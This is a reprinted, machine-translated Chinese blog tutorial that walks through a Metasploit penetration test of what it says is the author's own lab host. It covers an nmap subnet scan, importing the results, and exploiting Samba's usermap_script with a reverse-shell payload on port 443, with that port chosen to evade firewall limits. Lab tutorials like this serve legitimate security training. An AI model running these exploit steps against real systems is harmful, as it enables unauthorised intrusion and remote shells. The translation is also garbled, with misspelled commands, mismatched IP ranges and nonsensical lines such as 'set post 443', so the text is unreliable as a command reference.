1, start the Metasploit
声明:本次渗透测试的主机是我自己在自己的攻击主机上搭建的另一个操作系统,为了真实性设置了常见的IP地址,如有重合但绝对不是任何实体公司或者单位的IP地址。
所以不承担任何法律责任 转载请注明出处
: (Reprinted https://www.cnblogs.com/xinxianquan/p/9586041.html)
using the command msfconsole start when you need to start twice, or Postgres SQL database can not be loaded successfully, resulting in Metasploit Services can not start, or start using msfgui interface in the form of Metasploit, but requires pre-installed, another command is msfcli (command line-based), when the proposed use of the traditional ways to enable direct, so the database and service will not start its configuration
2, using an address range namp scanning investigation, the generated report into Metasploit do further processing. namp scan time can be very long.
3, after scanning the generated data into Metasploit using command db_import my.xml,
While introducing a host or using nmap scanning data db_nmap -n -A
Inquiry service
Query Vulnerability
Use a loophole, this loophole needs to load query attack, according to the load attack we provide the required parameters.
Show more payload query (as a vulnerability can run multiple loads, it may be replaced with a different payload)
Set the payload to be loaded
Whether or not effectively attack once after loading set to see again what determines the set load successfully set
Enter exploit execution exploits
Now the flaw before the test command to sum up:
The first step: namp scan an IP address range of the host namp -n -oX my.xml 172.168.189.0/24
Step Two: Import Data namp scan results db_import my.xml
Step 3: Check Services service running on the remote host
Add that (here a single IP host can query simultaneously introduced the information namp) db_namp -n -A 172.16.189.131
The fourth step: tracking information if there are loopholes that can be utilized search samba (service name) type: exploit platform: unix
Step five: Exploit use exploit / mulit / samba / usermap_script
Step Six: query configuration parameters and load show options to load
Step Seven: query requires vulnerability load corresponding show payloads
Eighth step: setting the load set payload cmd / unix / reverse (load information)
Supplements (some attack load the information they need to attack the host, need to add) In addition, I want to explain here is set to be attacked remote host ports; general port settings to avoid restricting the remote side, port 443 443 port is generally set limits, the port is usually reserved for SSL traffic, you can bypass some settings port deployment.
Step 9: Again check whether the payload is loaded already set show options
Step 10: Set RHost LHost extreme slogans set RHOST 192.168.1.1 set post 443
Step Eleven: execution exploit